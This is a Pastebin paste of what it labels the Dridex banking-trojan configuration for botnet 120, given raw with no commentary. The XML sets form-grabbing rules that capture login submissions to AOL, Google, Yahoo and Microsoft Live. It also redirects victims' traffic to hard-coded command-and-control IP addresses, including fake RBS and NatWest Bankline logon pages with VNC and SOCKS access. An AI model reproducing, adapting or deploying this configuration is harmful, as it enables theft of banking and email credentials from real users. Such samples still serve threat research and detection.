Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dridex settings for botnet 120:
- <settings hash="b6c969f81bd2a6352ad6d1fc86f9807d92edac65">
- <httpshots>
- <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
- <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
- </httpshots>
- <formgrabber>
- <url type="deny">\.(swf)($|\?)</url>
- <url type="deny">/isapi/ocget.dll</url>
- <url type="allow">^https?://aol.com/.*/login/</url>
- <url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
- <url type="allow">^https?://login.yahoo.com/</url>
- <url type="allow">^https?://login.live.com/</url>
- <url type="deny">^https?://(\w+\.)?aol.com</url>
- <url type="deny">^https?://(\w+\.)?facebook.com/</url>
- <url type="deny">^https?://(\w+\.)?google</url>
- <url type="deny">^https?://(\w+\.)?yahoo</url>
- <url type="deny">^https?://(\w+\.)?youtube.com</url>
- <url type="deny">^https?://(\w+\.)?live.com</url>
- <url type="deny">^https?://(\w+\.)?twitter.com</url>
- <url type="deny">^https?://(\w+\.)?vk.com</url>
- <url type="deny">^https.*ocsp\..+$</url>
- <url type="deny">^https.*safebrowsing\..+$</url>
- <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
- <url type="deny">^https://s.*\.symcd\.com</url>
- <url type="deny">^https://s.*\.symcb\.com</url>
- <url type="deny">^https.*ocsp2\..+$</url>
- <url type="deny">localhost.+skypectoc/.+$</url>
- <url type="deny">\.messenger\.live\.com</url>
- <url type="deny">pipe\.skype\.com</url>
- <url type="deny">\.optimatic\.com</url>
- <url type="deny">hiro\.tv</url>
- <url type="deny">spotxchange\.com</url>
- <url type="deny">nielsen\.com</url>
- <url type="deny">mapquest\.com </url>
- <url type="deny">^https://.+\.skype\.com/api/</url>
- <url type="deny">(//|\.)lphbs.com</url>
- <url type="deny">(//|\.)zynga.com</url>
- </formgrabber>
- <redirects>
- <redirect name="1st" vnc="0" socks="0" uri="http://62.109.4.230:8080/addons" timeout="20">twister5.js</redirect>
- <redirect name="2nd" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">commonuifunc.js</redirect>
- <redirect name="tgp" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">notracking.js</redirect>
- <redirect name="rbs_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/rbs_logon/sys.php" timeout="40">https://www.bankline.rbs.com/</redirect>
- <redirect name="natwest_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/natwest_logon/sys.php" timeout="40">https://www.bankline.natwest.com/</redirect>
- </redirects>
- <httpinjects />
- </settings>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement